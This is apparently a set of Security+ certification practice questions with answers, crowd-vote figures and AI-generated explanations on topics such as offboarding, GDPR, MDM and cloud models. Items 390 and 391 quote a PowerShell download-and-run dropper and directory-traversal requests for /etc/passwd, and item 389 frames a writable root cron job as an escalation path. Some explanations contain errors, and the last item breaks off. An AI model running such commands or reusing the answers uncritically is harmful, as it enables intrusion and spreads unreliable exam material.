Explanation: An Access Control List (ACL) is the best configuration for this requirement because it allows the company to specify which external service providers can access the internal website. ACLs can be configured to permit or deny traffic based on IP addresses, ensuring that only a limited number of specific, external service providers can reach the website in a secure manner

366
Q

A retail executive recently accepted a job with a major competitor. The following week, a security analyst reviews the security logs and identifies successful logon attempts to access the departed executive’s accounts. Which of the following security practices would have addressed the issue?

a. A non-disclosure agreement
b. Least privilege
c. An acceptable use policy
d. Offboarding

A

d. Offboarding

Explanation: The issue of a departed executive’s accounts still being accessible could have been addressed through a proper offboarding process. Offboarding includes revoking access to company systems and data, ensuring that former employees can no longer log in or access sensitive information after they leave the organization. This would prevent the departed executive from logging in and protect the company from potential data breaches.

367
Q

A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and operated by an outdated and unsupported specialized Windows OS. Which of the following is MOST likely preventing the IT manager at the hospital from upgrading the specialized OS?

a. The time needed for the MRI vendor to upgrade the system would negatively impact patients.
b. The MRI vendor does not support newer versions of the OS.
c. Changing the OS breaches a support SLA with the MRI vendor.
d. The IT team does not have the budget required to upgrade the MRI scanner.

A

b. The MRI vendor does not support newer versions of the OS.

Explanation: The most likely reason preventing the IT manager from upgrading the specialized OS is that the MRI vendor does not support newer versions of the operating system. Many medical devices, like MRI scanners, use specialized software that is tightly integrated with specific OS versions. If the vendor does not provide support for newer OS versions, upgrading could lead to compatibility issues, loss of functionality, and lack of vendor support for troubleshooting and maintenance. This situation is common in the medical industry, where devices often rely on specific configurations approved by regulatory bodies and the device manufacturers.

368
Q

A company received a “right to be forgotten” request. To legally comply, the company must remove data related to the requester from its systems. Which of the following is the company MOST likely complying with?

a. NIST CSF
b. GDPR
c. PCI DSS
d. ISO 27001

A

b. GDPR

Explanation: The “right to be forgotten” is a provision under the General Data Protection Regulation (GDPR), which is a comprehensive data protection law in the European Union. GDPR gives individuals the right to request the deletion of their personal data from an organization’s systems under certain conditions. This request is also known as the right to erasure. Organizations subject to GDPR are legally required to comply with such requests, provided that no overriding lawful reason for retaining the data exists.

369
Q

A security team suspects that the cause of recent power consumption overloads is the unauthorized use of empty power outlets in the network rack. Which of the following options will mitigate this issue without compromising the number of outlets available?

a. Adding a new UPS dedicated to the rack
b. Installing a managed PDU
c. Using only a dual power supplies unit
d. Increasing power generator capacity

A

b. Installing a managed PDU

Explanation: A managed Power Distribution Unit (PDU) allows for better monitoring and control of power usage in a network rack. It provides detailed insights into power consumption at the outlet level, enabling the identification and prevention of unauthorized use of power outlets. This solution does not compromise the number of available outlets and helps to manage and balance the power load efficiently.

370
Q

An engineer wants to inspect traffic to a cluster of web servers in a cloud environment. Which of the following solutions should the engineer implement?

a. CASB
b. WAF
c. Load balancer
d. VPN

A

(Community B 69%, A 24%)
CASBs primarily focus on securing and controlling the use of cloud services and data, while a Web Application Firewall (WAF) is specifically designed to protect web applications and inspect traffic to web servers for security threats.

b. WAF (Web Application Firewall)

Explanation: A Web Application Firewall (WAF) is specifically designed to protect web applications by filtering and monitoring HTTP traffic between a web application and the Internet. It can inspect incoming traffic to the web servers, detect and filter out malicious requests, and provide detailed logging and monitoring capabilities. This helps ensure the security and integrity of the web servers in the cloud environment.

371
Q

A security analyst needs to implement an MDM solution for BYOD users that will allow the company to retain control over company emails residing on the devices and limit data exfiltration that might occur if the devices are lost or stolen. Which of the following would BEST meet these requirements? (Choose two.)

a. Full device encryption
b. Network usage rules
c. Geofencing
d. Containerization
e. Application approve list
f. Remote control

A

(Braindump : d. Containerization, f. Remote control)

Case for D & F :
While Full Disk Encryption is a valuable security measure, it primarily protects data at rest and would not necessarily prevent data exfiltration if the device is unlocked1.

Geofencing is a feature that triggers an action when a mobile device enters a set location, which can be useful for managing devices in specific locations but does not directly prevent data exfiltration3.

In summary, while all these features contribute to the overall security of a device, the Remote Control feature of MDM is the most directly relevant to limiting data exfiltration in the event of a device being lost or stol

(Community AD : 51%, DF 36%)

ChatGPT : D & F

d. Containerization
f. Remote control
Explanation:

Containerization:
    Purpose: Containerization allows the separation of corporate data and personal data on BYOD devices. This ensures that company emails and other corporate data are stored in a secure, isolated environment.
    Benefit: This method protects corporate data and can enforce policies specifically for the container without affecting the personal data on the device. It also simplifies the process of wiping only the corporate data if the device is lost or stolen.

Remote control:
    Purpose: Remote control allows the security team to manage and interact with the device remotely.
    Benefit: This capability is crucial for performing actions such as remote wipe or lock if a device is lost or stolen, thus preventing unauthorized access to company emails and other sensitive data.

Additional Context:

Full device encryption: While this helps protect data at rest, it does not specifically address the control over company emails or selective data exfiltration prevention.
Network usage rules: These can help in managing data usage but do not specifically control email data or offer capabilities for lost/stolen device scenarios.
Geofencing: This can be useful for restricting device usage based on location but does not directly address email control or data exfiltration.
Application approve list: This can prevent the installation of unauthorized applications but does not specifically manage or protect company emails.

Therefore, containerization and remote control are the best choices to meet the specified requirements.

372
Q

A security administrator is evaluating remote access solutions for employees who are geographically dispersed. Which of the following would provide the MOST secure remote access? (Choose two.)

a. IPSec
b. SFTP
c. SRTP
d. LDAPS
e. S/MIME
f. SSL VPN

A

(Community : AF 75%, AE 17%)

a. IPSec (Internet Protocol Security): IPSec provides strong security features for IP communications by authenticating and encrypting each IP packet in a communication session. It ensures data integrity, confidentiality, and authenticity, making it a robust choice for securing remote access VPN connections.

f. SSL VPN (Secure Sockets Layer Virtual Private Network): SSL VPNs use SSL/TLS protocols to provide secure remote access to internal network resources. They are designed to securely transport corporate data over the public internet by encrypting the entire communication session between the client and the VPN gateway. SSL VPNs are widely used for their ease of deployment and strong encryption capabilities.

These two options, IPSec and SSL VPN, are widely recognized for their ability to provide secure remote access over the internet. They offer encryption, authentication, and integrity protection, making them suitable for ensuring the security of communications between geographically dispersed employees and the corporate network.

373
Q

A malicious actor recently penetrated a company’s network and moved laterally to the data center. Upon investigation, a forensics firm wants to know what was in the memory on the compromised server. Which of the following files should be given to the forensics firm?

a. Security
b. Application
c. Dump
d. Syslog

A

c. Dump

A memory dump (often referred to as a memory image or core dump) is a snapshot of the contents of the server’s volatile memory (RAM) at a specific point in time. It contains a copy of the active processes, data structures, and potentially other details like network connections, opened files, and other volatile system state information. Analyzing a memory dump can provide insights into the activities that occurred on the server, including details about the actions taken by the malicious actor.

The other options are less likely to contain the detailed memory contents needed for forensic investigation:

a. Security: Typically refers to security-related configurations, logs, or policies.
b. Application: Contains information related to specific applications running on the server, but not necessarily memory contents.
d. Syslog: Contains logs generated by the system and applications, which are valuable for understanding events and activities but do not provide direct memory contents.

Therefore, the correct file to provide to the forensics firm for investigating what was in the memory on the compromised server is c. Dump (memory dump).

374
Q

A company is looking to migrate some servers to the cloud to minimize its technology footprint. The company has a customer relationship management system on premises. Which of the following solutions will require the LEAST infrastructure and application support from the company?

a. SaaS
b. IaaS
c. PaaS
d. SDN

A

a. SaaS (Software as a Service)

Here’s why SaaS is the correct choice:

SaaS delivers software applications over the internet, typically on a subscription basis. The applications are managed by a third-party provider (cloud service provider), which handles maintenance, updates, security, and infrastructure management.

With SaaS, the company does not need to manage or control the underlying cloud infrastructure (servers, networking, storage) or the software application itself. The responsibility for infrastructure support, application maintenance, and security patches lies with the SaaS provider.

This model is ideal for minimizing the company's technology footprint because it offloads almost all infrastructure and application support tasks to the SaaS provider. The company primarily focuses on using the application and managing user access and configurations rather than maintaining server hardware, operating systems, or application software.

In contrast, let’s briefly discuss the other options:

b. IaaS (Infrastructure as a Service): Provides virtualized computing resources over the internet. The company manages applications, data, runtime, and middleware, but the cloud provider manages virtualization, servers, storage, and networking.

c. PaaS (Platform as a Service): Provides a platform allowing customers to develop, run, and manage applications without the complexity of building and maintaining the infrastructure. The cloud provider manages the platform infrastructure and the company manages the applications and data.

d. SDN (Software-Defined Networking): Refers to the virtualization of network services, which can optimize and manage network resources dynamically. It is not directly related to minimizing infrastructure or application support for CRM systems.

Therefore, a. SaaS is the option that requires the least infrastructure and application support from the company when migrating a CRM system to the cloud.

375
Q

A network administrator needs to determine the sequence of a server farm’s logs. Which of the following should the administrator consider? (Choose two.)

a. Chain of custody
b. Tags
c. Reports
d. Time stamps
e. Hash values
f. Time offset

A

(Community DF 90%)

d. Time stamps
f. Time offset

d. Time stamps: Time stamps indicate when each log entry was recorded. By analyzing time stamps, the administrator can sequence the events in chronological order, which is crucial for understanding the timeline of events and identifying any anomalies or suspicious activities.

f. Time offset: Time offset refers to the difference in time between different logs or systems. It’s important to consider because servers within a farm may not all be synchronized perfectly. Understanding and adjusting for time offsets helps in accurately correlating events across different servers or logs within the farm.

Here’s a brief explanation of the other options:

a. Chain of custody: Chain of custody refers to the chronological documentation or paper trail that records the sequence of custody, control, transfer, analysis, and disposition of physical or electronic evidence. While important in forensic investigations, it doesn't directly aid in determining the sequence of server logs.

b. Tags: Tags can be metadata or labels associated with log entries, but they do not inherently determine the sequence of logs. They provide additional information for categorization and filtering.

c. Reports: Reports are summaries or analyses derived from logs but do not directly determine the sequence of logs themselves.

e. Hash values: Hash values are cryptographic representations of data for integrity verification but are not used to determine the sequence of logs.

Therefore, the most relevant considerations for determining the sequence of a server farm’s logs are d. Time stamps and f. Time offset.

(Braindump : d. Time stamps, e. Hash values)

376
Q

Which of the following is the BEST reason to maintain a functional and effective asset management policy that aids in ensuring the security of an organization?

a. To provide data to quantify risk based on the organization’s systems
b. To keep all software and hardware fully patched for known vulnerabilities
c. To only allow approved, organization-owned devices onto the business network
d. To standardize by selecting one laptop model for all users in the organization

A

a. To provide data to quantify risk based on the organization’s systems.

Here’s why:

Quantifying risk: Asset management policies help identify and catalog all hardware and software assets within the organization. This information is crucial for assessing the organization's overall security posture and identifying vulnerabilities that could be exploited. By understanding the scope and nature of its assets, an organization can effectively prioritize and allocate resources to manage and mitigate risks.

Let’s briefly evaluate the other options:

b. To keep all software and hardware fully patched for known vulnerabilities: While this is important and often a part of asset management practices, it focuses more on operational security and vulnerability management rather than the comprehensive risk assessment provided by asset management.

c. To only allow approved, organization-owned devices onto the business network: This relates more to network access control and device management policies rather than asset management, although asset management may support this effort by identifying unauthorized devices.

d. To standardize by selecting one laptop model for all users in the organization: This aims for consistency and simplicity in management but does not directly address the broader security benefits of asset management, such as risk assessment and mitigation.

Therefore, option a. To provide data to quantify risk based on the organization’s systems is the best reason because it highlights how asset management policies contribute directly to understanding and managing security risks across the organization.

377
Q

A security administrator, who is working for a government organization, would like to utilize classification and granular planning to secure top secret data and grant access on a need-to-know basis. Which of the following access control schemas should the administrator consider?

a. Mandatory
b. Rule-based
c. Discretionary
d. Role-based

A

a. Mandatory

Mandatory Access Control (MAC) is designed precisely for situations where strict access control is needed based on data sensitivity and security clearances. Here’s why it’s suitable:

Classification and granular planning: MAC enforces access control policies based on data classifications (e.g., top secret, secret, confidential) and security labels attached to subjects (users, processes) and objects (files, resources). This aligns perfectly with the requirement to secure top secret data through precise classification and planning.

Need-to-know basis: MAC ensures that access is granted strictly on a need-to-know basis, meaning users can only access data if they have the necessary security clearance and explicit authorization, regardless of the discretion of data owners or administrators.

In contrast, let’s briefly clarify the other options:

b. Rule-based: Rule-based access control (RBAC) defines access control rules based on policies but does not enforce the strict hierarchical control and labeling required for top secret data in government settings.

c. Discretionary: Discretionary Access Control (DAC) grants access rights based on the discretion of the data owner or resource custodian. It does not provide the level of control needed for top secret data where access must be strictly controlled based on security clearances and classifications.

d. Role-based: Role-Based Access Control (RBAC) assigns permissions to users based on their roles within an organization. While useful for managing permissions at a broader organizational level, it does not enforce the strict labeling and hierarchical access control needed for top secret data in government contexts.

Therefore, a. Mandatory Access Control (MAC) is the most appropriate access control schema for the security administrator to consider in this scenario to ensure that top secret data is secured and access is granted on a need-to-know basis according to strict classification and planning principles.

378
Q

An organization is outlining data stewardship roles and responsibilities. Which of the following employee roles would determine the purpose of data and how to process it?

a. Data custodian
b. Data controller
c. Data protection officer
d. Data processor

A

b. Data controller

Here’s why:

Data controller: The data controller is responsible for determining the purposes for which personal data is processed and the means by which it is processed. This role decides why certain data is collected, how it will be used, and the legal basis for its processing. The data controller ensures that processing activities comply with data protection regulations and organizational policies.

In contrast, let’s clarify the other options:

a. Data custodian: The data custodian is responsible for the storage, maintenance, and protection of data according to the policies set by the data controller. They implement and manage the technical aspects of data management, but they do not determine the purposes or methods of data processing.

c. Data protection officer: The Data Protection Officer (DPO) is responsible for overseeing data protection strategy and implementation to ensure compliance with data protection laws and regulations. They advise on data protection impact assessments (DPIAs) and monitor compliance, but they typically do not determine the purpose of data processing.

d. Data processor: The data processor processes personal data on behalf of the data controller, following the controller's instructions. They do not determine the purposes or methods of processing unless instructed by the data controller.

Therefore, b. Data controller is the role within an organization that determines the purpose of data and how to process it, making it essential in data stewardship roles and responsibilities.

379
Q

Multiple beaconing activities to a malicious domain have been observed. The malicious domain is hosting malware from various endpoints on the network. Which of the following technologies would be BEST to correlate the activities between the different endpoints?

a. Firewall
b. SIEM
c. IPS
d. Protocol analyzer

A

b. SIEM (Security Information and Event Management)

Here’s why SIEM is the most suitable choice:

Centralized monitoring: SIEM solutions aggregate and analyze log data from various sources across the network, including endpoints, firewalls, servers, and other network devices. This allows for comprehensive visibility into network activities, including beaconing activities to malicious domains.

Correlation capabilities: SIEM systems are designed to correlate events and activities across different endpoints and network devices. They can detect patterns and anomalies that indicate coordinated or widespread malicious activities, such as multiple endpoints communicating with the same malicious domain.

Alerting and reporting: SIEMs provide real-time monitoring, alerting, and reporting capabilities, which are crucial for identifying and responding to security incidents promptly. In the case of beaconing activities, SIEM can generate alerts based on predefined rules or anomaly detection algorithms.

In contrast, let’s briefly consider the other options:

a. Firewall: While firewalls provide network security by monitoring and controlling incoming and outgoing traffic, they typically do not have the extensive logging, correlation, and analysis capabilities necessary to track and correlate activities across multiple endpoints.

c. IPS (Intrusion Prevention System): IPS systems focus on identifying and blocking suspicious network traffic and activities. While they can detect some malicious activities, they do not provide the holistic endpoint visibility and correlation capabilities offered by SIEM.

d. Protocol analyzer: Protocol analyzers (or packet analyzers) capture and analyze network traffic at a packet level, which can be useful for deep inspection of network communications. However, they lack the centralized logging and correlation features needed to effectively correlate activities across different endpoints in real-time.

Therefore, b. SIEM is the best technology for correlating activities between different endpoints, especially in the scenario of observing multiple beaconing activities to a malicious domain hosting malware.

380
Q

Which of the following types of controls is a turnstile?

a. Physical
b. Detective
c. Corrective
d. Technical

A

The type of control that a turnstile represents is:

a. Physical

Here’s why:

Physical controls are measures implemented physically to protect resources, personnel, and facilities. Turnstiles are physical barriers or access control devices that regulate or restrict entry to a specific area or facility. They physically prevent unauthorized individuals from passing through unless they have the appropriate authorization (e.g., a valid ticket, badge, or access card).

In contrast, let’s briefly define the other types of controls:

Detective controls are designed to detect and identify security incidents or anomalies after they have occurred. Examples include log monitoring, security cameras, and intrusion detection systems (IDS).

Corrective controls are implemented to mitigate the impact of security incidents and restore systems to normal operations. Examples include incident response procedures, backup and recovery plans, and system restoration processes.

Technical controls encompass security measures that are implemented using technology. This includes firewalls, encryption, access control systems (like turnstiles), antivirus software, and authentication mechanisms.

Therefore, the correct answer is a. Physical, as turnstiles are physical controls used for access regulation.

381
Q

Users report access to an application from an internal workstation is still unavailable to a specific server, even after a recent firewall rule implementation that was requested for this access. ICMP traffic is successful between the two devices. Which of the following tools should the security analyst use to help identify if the traffic is being blocked?

a. nmap
b. tracert
c. ping
d. ssh

A

a. nmap

nmap (Network Mapper) is a versatile network scanning tool that can be used to discover hosts and services on a computer network. In this context, it can help determine if the specific server is reachable from the internal workstation and if specific ports necessary for application access are open or blocked.

Here’s how nmap can assist:

Port scanning: nmap can perform port scans to check which ports on the server are open and accessible from the workstation. If the firewall rule was intended to allow access to specific ports, nmap can verify if these ports are indeed reachable.

Service detection: nmap can identify the services running on the server and their respective ports. This helps in troubleshooting whether the expected application service is accessible and responsive.

In contrast, let’s briefly discuss the other options:

b. tracert (traceroute): Traceroute shows the path that packets take from the source to the destination, displaying each hop along the way. While useful for diagnosing routing issues, it doesn't directly verify if traffic is being blocked by a firewall.

c. ping: Ping checks the basic connectivity between two devices by sending ICMP echo requests and receiving ICMP echo replies. While it confirms basic connectivity (as noted in the question), it doesn't provide information on whether specific ports are being blocked.

d. ssh: Secure Shell (SSH) is a protocol used for securely accessing a remote server. It is not relevant in this context for diagnosing firewall blocking issues.

Therefore, a. nmap is the appropriate tool for the security analyst to use to help identify if the traffic is being blocked by the firewall after the recent rule implementation.

382
Q

As part of annual audit requirements, the security team performed a review of exceptions to the company policy that allows specific users the ability to use USB storage devices on their laptops. The review yielded the following results:

*The exception process and policy have been correctly followed by the majority of users.
*A small number of users did not create tickets for the requests but were granted access.
*All access had been approved by supervisors.
*Valid requests for the access sporadically occurred across multiple departments.
*Access, in most cases, had not been removed when it was no longer needed.

Which of the following should the company do to ensure that appropriate access is not disrupted but unneeded access is removed in a reasonable time frame?

a. Create an automated, monthly attestation process that removes access if an employee’s supervisor denies the approval.
b. Remove access for all employees and only allow new access to be granted if the employee’s supervisor approves the request.
c. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the management team.
d. Implement a ticketing system that tracks each request and generates reports listing which employees actively use USB storage devices.

A

c. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the management team.

Here’s why this option is the most suitable:

Quarterly audits: Regular audits allow the security team to review all user accounts that have been granted exceptions to use USB storage devices. By doing so, they can verify the validity of each exception and ensure that access is still justified based on current needs. This helps in identifying instances where access should be revoked because it is no longer required.

Verification with management: Auditing exceptions with the management team ensures that all access has appropriate supervisory approval and oversight. This step addresses the issue where some users were granted access without following the formal ticketing process but had supervisor approval. It also aligns with audit requirements to maintain proper documentation and oversight of access control decisions.

Let’s briefly review why the other options are less suitable:

a. Create an automated, monthly attestation process that removes access if an employee’s supervisor denies the approval: While automation can streamline processes, it may not capture nuanced decisions or changes in access needs between monthly intervals, potentially disrupting legitimate access.

b. Remove access for all employees and only allow new access to be granted if the employee’s supervisor approves the request: This approach is overly restrictive and could disrupt legitimate business needs, especially for ongoing projects or roles that require USB device usage.

d. Implement a ticketing system that tracks each request and generates reports listing which employees actively use USB storage devices: While a ticketing system is useful for tracking requests, it doesn't directly address the need to periodically review and revoke unnecessary access that was previously granted.

Therefore, c. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the management team is the most effective strategy to ensure appropriate access control without disrupting legitimate operations while also addressing the issue of unneeded access not being removed promptly.

383
Q

A financial institution would like to store its customer data in a cloud but still allow the data to be accessed and manipulated while encrypted. Doing so would prevent the cloud service provider from being able to decipher the data due to its sensitivity. The financial institution is not concerned about computational overheads and slow speeds. Which of the following cryptographic techniques would BEST meet the requirement?

a. Asymmetric
b. Symmetric
c. Homomorphic
d. Ephemeral

A

c. Homomorphic encryption

Here’s why:

Homomorphic encryption allows computations to be performed on encrypted data without decrypting it first. This means that authorized parties can perform operations (such as addition, multiplication, etc.) on the encrypted data, obtain results in encrypted form, and then decrypt the results to obtain the same outcome as if the operations had been performed on the plaintext data.

For a financial institution storing sensitive customer data in the cloud, homomorphic encryption ensures that the data remains encrypted at all times, even during processing and manipulation. This prevents the cloud service provider (CSP) or any unauthorized parties from accessing or deciphering the sensitive data, thus preserving confidentiality.

While homomorphic encryption can be computationally intensive and may introduce some latency due to its complex operations, these concerns are secondary according to the scenario where computational overheads and slow speeds are not critical issues.

In contrast, let’s briefly review the other options:

a. Asymmetric encryption: In asymmetric encryption, different keys are used for encryption and decryption. It's not typically used for computations on encrypted data but rather for secure communication and digital signatures.

b. Symmetric encryption: Symmetric encryption uses the same key for both encryption and decryption. While efficient for data storage and transmission, it doesn't support computation on encrypted data as required in the scenario.

d. Ephemeral encryption: Ephemeral encryption refers to short-lived keys used for encryption and is not directly related to the ability to perform computations on encrypted data.

Therefore, c. Homomorphic encryption is the most appropriate cryptographic technique to allow the financial institution to store and manipulate customer data in the cloud while maintaining strong security through encryption.

384
Q

A cryptomining company recently deployed a new antivirus application to all of its mining systems. The installation of the antivirus application was tested on many personal devices, and no issues were observed. Once the antivirus application was rolled out to the servers, constant issues were reported. As a result, the company decided to remove the mining software. The antivirus application was MOST likely classifying the software as:

a. a rootkit.
b. a PUP.
c. a backdoor.
d. ransomware.
e. a RAT.

A

b. a PUP (Potentially Unwanted Program)

Here’s why:

Potentially Unwanted Program (PUP): Antivirus applications often flag software as PUPs if they exhibit behaviors or characteristics that are not inherently malicious but may be undesirable or unwanted. Cryptomining software, while not necessarily harmful in intent, can consume significant system resources (CPU, GPU) and may exhibit behavior patterns (like high resource usage) that antivirus software flags as potentially unwanted.

Constant issues reported after antivirus deployment: If the antivirus application was causing issues only after the mining software was deployed to servers (which are typically more critical and sensitive systems than personal devices), it suggests that the antivirus was reacting to the mining software's behavior or characteristics as potentially unwanted.

In contrast, let’s briefly review the other options:

a. a rootkit: Rootkits are malicious software designed to gain unauthorized access and hide the presence of other malicious software or activities. Cryptomining software, while intrusive in resource usage, typically does not operate as a rootkit.

c. a backdoor: A backdoor is a type of malicious software that provides unauthorized access to a system. Cryptomining software, if not maliciously intended, would not function as a backdoor.

d. ransomware: Ransomware encrypts data and demands payment for decryption. Cryptomining software is unrelated to ransomware behavior.

e. a RAT (Remote Access Trojan): RATs are malicious programs that allow remote control of a compromised system. Cryptomining software does not fall into this category unless modified maliciously.

Therefore, b. a PUP (Potentially Unwanted Program) is the most likely classification that the antivirus application applied to the mining software, leading to the reported issues and the decision to remove the mining software from the servers.

385
Q

A cybersecurity administrator is using iptables as an enterprise firewall. The administrator created some rules, but the network now seems to be unresponsive. All connections are being dropped by the firewall. Which of the following would be the BEST option to remove the rules?

a. # iptables -t mangle -X
b. # iptables -F
c. # iptables -Z
d. # iptables -P INPUT -j DROP

A

When faced with a situation where iptables rules are causing the network to become unresponsive by dropping all connections, the BEST option to remove those rules and restore normal network functionality is:

b. # iptables -F

Explanation:

iptables -F: This command flushes (deletes) all the rules from the selected chain (by default, the filter table, which handles INPUT, OUTPUT, and FORWARD chains). Flushing the rules will effectively remove all firewall rules, including any that might be causing the network to drop all connections.

Let’s briefly review the other options for clarity:

a. # iptables -t mangle -X: This command deletes all the non-builtin chains in the mangle table. It's useful for removing user-defined chains in the mangle table, but it does not remove rules from the filter table which is typically used for network filtering.

c. # iptables -Z: This command resets the packet and byte counters in all chains. It does not remove rules; it just clears the counters.

d. # iptables -P INPUT -j DROP: This command sets the default policy for the INPUT chain to DROP, which means all incoming packets are dropped unless explicitly allowed by rules. This doesn't remove rules but changes the default action for incoming packets.

Therefore, b. # iptables -F is the correct and most appropriate option to remove all rules and restore normal network connectivity when iptables rules are causing the network to become unresponsive.

386
Q

An incident response technician collected a mobile device during an investigation. Which of the following should the technician do to maintain chain of custody?

a. Document the collection and require a sign-off when possession changes.
b. Lock the device in a safe or other secure location to prevent theft or alteration.
c. Place the device in a Faraday cage to prevent corruption of the data.
d. Record the collection in a blockchain-protected public ledger.

A

a. Document the collection and require a sign-off when possession changes.

Here’s why this option is correct:

Documenting the collection: This involves recording details such as the date, time, location, condition of the device, and the person who collected it. Documenting ensures a clear record of when and how the device was collected, which is essential for maintaining the chain of custody.

Sign-off when possession changes: Requiring a sign-off ensures accountability and documentation of who has possession of the device at any given time. This helps prevent unauthorized access or tampering with the device during the investigation process.

In contrast, let’s briefly review why the other options are less appropriate:

b. Lock the device in a safe or other secure location to prevent theft or alteration: While securing the device is important, chain of custody involves documenting every instance of possession change and maintaining a record, not just securing the physical location.

c. Place the device in a Faraday cage to prevent corruption of the data: Faraday cages are used to block electromagnetic signals, which is typically done to prevent remote wiping or alteration of data, but it does not address the documentation and accountability aspects of chain of custody.

d. Record the collection in a blockchain-protected public ledger: While blockchain technology can provide immutable records, it is not commonly used for everyday chain of custody purposes in incident response. Documentation and sign-offs are more practical and widely accepted methods.

Therefore, a. Document the collection and require a sign-off when possession changes is the best practice for maintaining chain of custody when collecting a mobile device during an investigation.

387
Q

A company recently implemented a patch management policy; however, vulnerability scanners have still been flagging several hosts, even after the completion of the patch process. Which of the following is the MOST likely cause of the issue?

a. The vendor firmware lacks support.
b. Zero-day vulnerabilities are being discovered.
c. Third-party applications are not being patched.
d. Code development is being outsourced.

A

c. Third-party applications are not being patched.

Here’s why this option is likely:

Third-party applications: While the company may have implemented a patch management policy for its own operating systems and software, third-party applications (such as software from other vendors or providers) often require separate patching processes. These applications can include plugins, libraries, middleware, and other software components that are critical but not directly controlled by the company's internal patch management policy.

Vulnerability scanners: These scanners detect vulnerabilities not only in the company's core operating systems and applications but also in third-party software. If third-party applications are not included in the patch management process or if patches are not applied promptly, vulnerability scanners will continue to flag these hosts as vulnerable.

Let’s briefly review the other options for clarity:

a. The vendor firmware lacks support: While outdated vendor firmware can be a vulnerability issue, it typically affects specific hardware components and is less likely to be the sole reason for vulnerability scanner flags across multiple hosts.

b. Zero-day vulnerabilities are being discovered: Zero-day vulnerabilities are newly discovered vulnerabilities for which no patch or mitigation is available. While serious, they are less likely to be the cause if the issue persists after the completion of a patch management process, as zero-day vulnerabilities are usually not addressed immediately by patches.

d. Code development is being outsourced: Outsourced code development can introduce security risks, but it's not directly related to the ongoing vulnerability scanner flags unless specific vulnerabilities are introduced due to insecure coding practices.

Therefore, c. Third-party applications are not being patched is the most likely cause of the vulnerability scanner flags continuing after the patch management process. Addressing third-party application patching alongside internal systems can help mitigate these ongoing vulnerabilities.

388
Q

Which of the following controls would provide the BEST protection against tailgating?

a. Access control vestibule
b. Closed-circuit television
c. Proximity card reader
d. Faraday cage

A

a. Access control vestibule

Here’s why:

Access control vestibule: Also known as a mantrap or airlock, an access control vestibule is designed to allow only one person to pass through at a time. It typically consists of two sets of interlocking doors. The first set of doors must close and lock before the second set of doors can open, ensuring that only one person can enter or exit at a time. This effectively prevents unauthorized individuals from following closely behind an authorized person (tailgating) without proper authentication.

In contrast, let’s briefly review the other options:

b. Closed-circuit television (CCTV): CCTV provides video surveillance but does not physically prevent tailgating. It can be used to monitor and record incidents of tailgating but does not directly stop unauthorized access.

c. Proximity card reader: While proximity card readers authenticate individuals based on their proximity cards, they do not prevent tailgating by themselves. Tailgating can occur if an unauthorized person closely follows an authorized person through the door before it closes.

d. Faraday cage: A Faraday cage is designed to block electromagnetic signals and is used primarily for preventing electronic eavesdropping or interference. It is not relevant for physical access control against tailgating.

Therefore, a. Access control vestibule is the best control among the options listed to effectively prevent tailgating by enforcing a single-person entry and exit process through secured doors.

389
Q

A penetration tester executes the command crontab -l while working in a Linux server environment. The penetration tester observes the following string in the current user’s list of cron jobs:

*/10 * * * * root /writable/update.sh

Which of the following actions should the penetration tester perform NEXT?

a. Privilege escalation
b. Memory leak
c. Directory traversal
d. Race condition

A

a. Privilege escalation

Here’s why:

Cron job as root: The cron job is configured to execute a script (update.sh) located in a writable directory (/writable/) as the root user. This setup indicates that the script runs with elevated privileges, potentially allowing the penetration tester to execute commands as root.

Objective: By identifying the cron job and its configuration, the penetration tester can now focus on exploiting potential vulnerabilities within the /writable/update.sh script or the writable directory itself to escalate privileges and gain root access.

Let’s briefly review the other options for clarity:

b. Memory leak: A memory leak refers to a situation where a program fails to release memory it has allocated but no longer needs. It is unrelated to the observed cron job configuration.

c. Directory traversal: Directory traversal involves exploiting insufficient security validation in file path inputs to access files outside of the intended directory. It is not directly relevant to the cron job scenario described.

d. Race condition: A race condition occurs when two or more operations are performed concurrently, leading to unexpected outcomes due to the sequence of execution. While it can be a security issue, it is not directly applicable to the cron job observation scenario.

Therefore, a. Privilege escalation is the next logical action for the penetration tester after identifying the root-executed cron job, aiming to exploit it to gain escalated privileges on the Linux server.

390
Q

An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does and finds that it executes the following script:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundl132.exe $env:TEMP\autoupdate.dll

Which of the following BEST describes what the analyst found?

a. A PowerShell code is performing a DLL injection.
b. A PowerShell code is displaying a picture.
c. A PowerShell code is configuring environmental variables.
d. A PowerShell code is changing Windows Update settings.

A

a. A PowerShell code is performing a DLL injection.

Here’s why this option is the best description:

Script Analysis:
    The script uses PowerShell (powershell.exe) to download a file (04EB18.jpg) from the specified URI (https://somehost.com/).
    It saves the downloaded file as autoupdate.dll in the temporary directory ($env:TEMP).
    After downloading, it executes (Start-Process) rundl132.exe (which appears to be a typo for rundll32.exe, a legitimate Windows executable used for running DLLs as programs) with autoupdate.dll as the argument.

DLL Injection: The script's behavior of downloading a file (autoupdate.dll) and then executing it with rundll32.exe suggests a typical method used in DLL injection attacks. DLL injection involves loading and executing malicious DLLs within the context of another process (in this case, rundll32.exe), potentially compromising system integrity and security.

In contrast, let’s briefly review the other options:

b. A PowerShell code is displaying a picture: While the script mentions downloading a file (04EB18.jpg), it's actually saving it as a DLL (autoupdate.dll) and executing it, not displaying it as an image.

c. A PowerShell code is configuring environmental variables: The script uses $env:TEMP to specify the temporary directory for saving the downloaded file, but it's not primarily focused on configuring environmental variables.

d. A PowerShell code is changing Windows Update settings: There is no indication in the script that it is modifying Windows Update settings. Instead, it is downloading and executing a potentially malicious DLL.

Therefore, a. A PowerShell code is performing a DLL injection accurately describes the actions and intent of the PowerShell script as observed by the security analyst.

391
Q

A security engineer obtained the following output from a threat intelligence source that recently performed an attack on the company’s server:

GET index.php?page=..2f..2f..2f..2f..2f..2f..2f..2f..2fetcefpasswd
GET index.php?page=..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetcefpasswd
GET index.php?page=..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetcefpasswd

Which of the following BEST describes this kind of attack?

a. Directory traversal
b. SQL injection
c. API
d. Request forgery

A

a. Directory traversal

Here’s why this option is the best description:

